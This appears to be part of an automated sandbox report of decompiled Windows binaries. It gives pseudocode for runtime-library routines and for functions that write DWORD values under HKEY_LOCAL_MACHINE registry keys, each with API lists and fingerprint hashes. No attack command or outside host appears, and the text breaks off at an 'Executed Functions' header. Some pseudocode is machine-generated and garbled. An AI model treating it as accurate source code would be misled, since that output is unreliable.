                                                                                                                                                      				_t14 = _t38;
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				_push(es);
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				asm("repne rol byte [eax], 0x10");
                                                                                                                                                      				asm("adc eax, ebp");
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				asm("adc [ebx-0x40], ah");
                                                                                                                                                      				 *_t14 =  *_t14 + __edx;
                                                                                                                                                      				asm("adc [edx+0xc], ch");
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x103301c0);
                                                                                                                                                      				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
                                                                                                                                                      				_t36 =  *0x00000180;
                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                      					if( *0x10335f3c != 3) {
                                                                                                                                                      						_push(_t36);
                                                                                                                                                      						goto L8;
                                                                                                                                                      					} else {
                                                                                                                                                      						L1000FA03(4);
                                                                                                                                                      						 *0x00000174 =  *0x00000174 & 0x00000000;
                                                                                                                                                      						_t20 = E1000FA7C(_t36);
                                                                                                                                                      						 *0x0000015C = _t20;
                                                                                                                                                      						if(_t20 != 0) {
                                                                                                                                                      							_push(_t36);
                                                                                                                                                      							_push(_t20);
                                                                                                                                                      							E1000FAA7();
                                                                                                                                                      						}
                                                                                                                                                      						 *0x00000174 = 0xfffffffe;
                                                                                                                                                      						_t15 = E1000CA86();
                                                                                                                                                      						if( *((intOrPtr*)(0x15c)) == 0) {
                                                                                                                                                      							_push( *((intOrPtr*)(0x180)));
                                                                                                                                                      							L8:
                                                                                                                                                      							_t15 = HeapFree( *0x10333310, 0, ??);
                                                                                                                                                      							_t47 = _t15;
                                                                                                                                                      							if(_t15 == 0) {
                                                                                                                                                      								_t17 = E1000F720(_t47);
                                                                                                                                                      								 *_t17 = E1000F6E5(GetLastError());
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return E10010579(_t15);
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction ID: f3614e2ed5c3b7a2523f888baaf654e085a5ac9fd5a4e10f0babc6e667b4755f
                                                                                                                                                      • Opcode Fuzzy Hash: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                      • Instruction Fuzzy Hash: D921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				short* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v12 = E1000CAC0(_a4);
                                                                                                                                                      				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
                                                                                                                                                      				_t9 = _v8 + 2; // 0x2
                                                                                                                                                      				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
                                                                                                                                                      				_t13 = _v8 + 2; // 0x2
                                                                                                                                                      				E1000CF20(__edi, _v16, 0, _v8 + _t13);
                                                                                                                                                      				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
                                                                                                                                                      				_v16[_v8] = 0;
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A381
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                      • _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 745779501-0
                                                                                                                                                      • Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
                                                                                                                                                      • Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402B80(void* _a4, char* _a8, char _a12) {
                                                                                                                                                      				long _t13;
                                                                                                                                                      				char* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t23 = _a4;
                                                                                                                                                      				if(RegOpenKeyExA(0x80000002, _t23, 0, 0x102,  &_a4) == 0 || RegCreateKeyExA(0x80000002, _t23, 0, 0, 0, 0xf013f, 0,  &_a4, 0) == 0) {
                                                                                                                                                      					_t13 = RegSetValueExA(_a4, _a8, 0, 4,  &_a12, 4);
                                                                                                                                                      					RegCloseKey(_a4);
                                                                                                                                                      					return 0 | _t13 == 0x00000000;
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000102,?), ref: 00402B97
                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402BBB
                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00402BDE
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BEB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateOpenValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776291540-0
                                                                                                                                                      • Opcode ID: e67dd30e4998f12c05531f5aa9724ed1f1c816c8c9d0428bf3833eaab55c34ae
                                                                                                                                                      • Instruction ID: ad08d0a4e727adc7a06136ec506084d49ae250f6fb43ebd82b7ce4284d3e4376
                                                                                                                                                      • Opcode Fuzzy Hash: e67dd30e4998f12c05531f5aa9724ed1f1c816c8c9d0428bf3833eaab55c34ae
                                                                                                                                                      • Instruction Fuzzy Hash: 17013171354311BBF2208B60DD0AF7B77A8EB84B50F10881CBB54BA2D4D6B0E840C6AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 39%
                                                                                                                                                      			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr* _t10;
                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x103301c0);
                                                                                                                                                      				_t8 = E10010534(__ebx, __edi, __esi);
                                                                                                                                                      				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                      					L9:
                                                                                                                                                      					return E10010579(_t8);
                                                                                                                                                      				}
                                                                                                                                                      				if( *0x10335f3c != 3) {
                                                                                                                                                      					_push(_t23);
                                                                                                                                                      					L7:
                                                                                                                                                      					_t8 = HeapFree( *0x10333310, 0, ??);
                                                                                                                                                      					_t31 = _t8;
                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                      						_t10 = E1000F720(_t31);
                                                                                                                                                      						 *_t10 = E1000F6E5(GetLastError());
                                                                                                                                                      					}
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				L1000FA03(4);
                                                                                                                                                      				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                      				_t13 = E1000FA7C(_t23);
                                                                                                                                                      				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                      				if(_t13 != 0) {
                                                                                                                                                      					_push(_t23);
                                                                                                                                                      					_push(_t13);
                                                                                                                                                      					E1000FAA7();
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                      				_t8 = E1000CA86();
                                                                                                                                                      				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                      					goto L9;
                                                                                                                                                      				} else {
                                                                                                                                                      					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F570() {
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				struct _SYSTEMTIME _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				struct _SYSTEMTIME _v52;
                                                                                                                                                      				struct _FILETIME _v60;
                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                      
                                                                                                                                                      				_v28.wYear = 0x7b2;
                                                                                                                                                      				_v28.wMonth = 1;
                                                                                                                                                      				_v28.wDay = 1;
                                                                                                                                                      				_v28.wHour = 0;
                                                                                                                                                      				_v28.wMinute = 0;
                                                                                                                                                      				_v28.wSecond = 0;
                                                                                                                                                      				_v28.wMilliseconds = 0;
                                                                                                                                                      				GetSystemTime( &_v52);
                                                                                                                                                      				SystemTimeToFileTime( &_v52,  &_v12);
                                                                                                                                                      				SystemTimeToFileTime( &_v28,  &_v60);
                                                                                                                                                      				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                      				asm("sbb eax, [ebp-0x34]");
                                                                                                                                                      				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
                                                                                                                                                      				_v32 = _t31;
                                                                                                                                                      				return _v36;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 1001F5A4
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F5DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3735792614-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402B10(void* _a4, char* _a8, char _a12) {
                                                                                                                                                      				long _t13;
                                                                                                                                                      				char* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t23 = _a4;
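                                                                                                                                                      				if(RegOpenKeyA(0x80000002, _t23,  &_a4) == 0 || RegCreateKeyA(0x80000002, _t23,  &_a4) == 0) { // 0x80000002 = HKEY_LOCAL_MACHINE; open the subkey, or create it if opening fails
                                                                                                                                                      					_t13 = RegSetValueExA(_a4, _a8, 0, 4,  &_a12, 4); // type 4 = REG_DWORD, 4 bytes of data taken from _a12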
                                                                                                                                                      					RegCloseKey(_a4);
                                                                                                                                                      					return 0 | _t13 == 0x00000000;
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00402B20
                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00402B35
                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00402B58
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B65
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateOpenValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776291540-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00408A8A(void* __ebx, void* __edi) {
                                                                                                                                                      				char _v17;
                                                                                                                                                      				signed char _v18;
                                                                                                                                                      				struct _cpinfo _v24;
                                                                                                                                                      				char _v280;
                                                                                                                                                      				char _v536;
                                                                                                                                                      				char _v792;
                                                                                                                                                      				char _v1304;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      				char _t44;
                                                                                                                                                      				signed char _t45;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				signed char _t64;
                                                                                                                                                      				intOrPtr* _t66;
                                                                                                                                                      				signed int _t68;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				signed int _t71;
                                                                                                                                                      				signed char _t76;
                                                                                                                                                      				signed char _t77;
                                                                                                                                                      				signed char* _t78;
                                                                                                                                                      				void* _t81;
                                                                                                                                                      				void* _t87;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      
                                                                                                                                                      				if(GetCPInfo( *0x410af8,  &_v24) == 1) {
                                                                                                                                                      					_t44 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                                                                                                                                                      						_t44 = _t44 + 1;
                                                                                                                                                      					} while (_t44 < 0x100);
                                                                                                                                                      					_t45 = _v18;
                                                                                                                                                      					_v280 = 0x20;
                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                      						L9:
                                                                                                                                                      						E004090EB(1,  &_v280, 0x100,  &_v1304,  *0x410af8,  *0x410d24, 0);
                                                                                                                                                      						E004081AA( *0x410d24, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x410af8, 0);
                                                                                                                                                      						E004081AA( *0x410d24, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x410af8, 0);
                                                                                                                                                      						_t55 = 0;
                                                                                                                                                      						_t66 =  &_v1304;
                                                                                                                                                      						do {
                                                                                                                                                      							_t76 =  *_t66;
                                                                                                                                                      							if((_t76 & 0x00000001) == 0) {
                                                                                                                                                      								if((_t76 & 0x00000002) == 0) {
                                                                                                                                                      									 *(_t55 + 0x410b20) =  *(_t55 + 0x410b20) & 0x00000000;
                                                                                                                                                      									goto L16;
                                                                                                                                                      								}
                                                                                                                                                      								 *(_t55 + 0x410c21) =  *(_t55 + 0x410c21) | 0x00000020;
                                                                                                                                                      								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                                                                                                                                                      								L12:
                                                                                                                                                      								 *(_t55 + 0x410b20) = _t77;
                                                                                                                                                      								goto L16;
                                                                                                                                                      							}
                                                                                                                                                      							 *(_t55 + 0x410c21) =  *(_t55 + 0x410c21) | 0x00000010;
                                                                                                                                                      							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                                                                                                                                                      							goto L12;
                                                                                                                                                      							L16:
                                                                                                                                                      							_t55 = _t55 + 1;
                                                                                                                                                      							_t66 = _t66 + 2;
                                                                                                                                                      						} while (_t55 < 0x100);
                                                                                                                                                      						return _t55;
                                                                                                                                                      					}
                                                                                                                                                      					_t78 =  &_v17;
                                                                                                                                                      					do {
                                                                                                                                                      						_t68 =  *_t78 & 0x000000ff;
                                                                                                                                                      						_t56 = _t45 & 0x000000ff;
                                                                                                                                                      						if(_t56 <= _t68) {
                                                                                                                                                      							_t81 = _t87 + _t56 - 0x114;
                                                                                                                                                      							_t70 = _t68 - _t56 + 1;
                                                                                                                                                      							_t71 = _t70 >> 2;
                                                                                                                                                      							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                                                                                                                                                      							_t88 = _t88 + 0x18;
                                                                                                                                                      						}
                                                                                                                                                      						_t78 =  &(_t78[2]);
                                                                                                                                                      						_t45 =  *((intOrPtr*)(_t78 - 1));
                                                                                                                                                      					} while (_t45 != 0);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				_t43 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					if(_t43 < 0x41 || _t43 > 0x5a) {
                                                                                                                                                      						if(_t43 < 0x61 || _t43 > 0x7a) {
                                                                                                                                                      							 *(_t43 + 0x410b20) =  *(_t43 + 0x410b20) & 0x00000000;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *(_t43 + 0x410c21) =  *(_t43 + 0x410c21) | 0x00000020;
                                                                                                                                                      							_t64 = _t43 - 0x20;
                                                                                                                                                      							goto L22;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						 *(_t43 + 0x410c21) =  *(_t43 + 0x410c21) | 0x00000010;
                                                                                                                                                      						_t64 = _t43 + 0x20;
                                                                                                                                                      						L22:
                                                                                                                                                      						 *(_t43 + 0x410b20) = _t64;
                                                                                                                                                      					}
                                                                                                                                                      					_t43 = _t43 + 1;
                                                                                                                                                      				} while (_t43 < 0x100);
                                                                                                                                                      				return _t43;
                                                                                                                                                      			}

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Info
                                                                                                                                                      • String ID: $
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E100026D0(void* __eflags) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v56;
                                                                                                                                                      				char _v84;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                      
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022D98);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t20;
                                                                                                                                                      				E10001160( &_v84, __eflags, "vector<T> too long");
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E10001E70( &_v56,  &_v84);
                                                                                                                                                      				E1000EBEB( &_v56, 0x103307a8);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				_t14 = E100011A0( &_v84);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMTD ref: 10002706
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10002714
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                      • API String ID: 1843230569-3788999226
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr* _t20;
                                                                                                                                                      				intOrPtr* _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __eflags;
                                                                                                                                                      				_push(0x44);
                                                                                                                                                      				E1000F00B(E10022968, __ebx, __edi, __esi);
                                                                                                                                                      				E10001160(_t25 - 0x28, _t27, "invalid string position");
                                                                                                                                                      				_t2 = _t25 - 4;
                                                                                                                                                      				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                      				_t20 = _t25 - 0x50;
                                                                                                                                                      				E10001D90(_t20,  *_t2, _t25 - 0x28);
                                                                                                                                                      				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
                                                                                                                                                      				E1000EBEB(_t25 - 0x50, 0x10330158);
                                                                                                                                                      				asm("int3");
                                                                                                                                                      				_push(__esi);
                                                                                                                                                      				_t23 = _t20;
                                                                                                                                                      				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                      				 *_t23 = 0x100232c8;
                                                                                                                                                      				return _t23;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 10004433
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10004465
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                        • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
                                                                                                                                                      Strings
                                                                                                                                                      • invalid string position, xrefs: 10004438
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                      • API String ID: 2977319401-1799206989
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E100204C0(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v311;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v575;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				long _v580;
                                                                                                                                                      				intOrPtr _v584;
                                                                                                                                                      				intOrPtr _v588;
                                                                                                                                                      				intOrPtr _v592;
                                                                                                                                                      				intOrPtr _v596;
                                                                                                                                                      				intOrPtr _v600;
                                                                                                                                                      				intOrPtr _v604;
                                                                                                                                                      				intOrPtr _v608;
                                                                                                                                                      				intOrPtr _v612;
                                                                                                                                                      				intOrPtr _v616;
                                                                                                                                                      				intOrPtr _v620;
                                                                                                                                                      				intOrPtr _v624;
                                                                                                                                                      				intOrPtr _v628;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				int _t47;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                      				int _t75;
                                                                                                                                                      				int _t77;
                                                                                                                                                      				void* _t101;
                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				void* _t109;
                                                                                                                                                      				void* _t111;
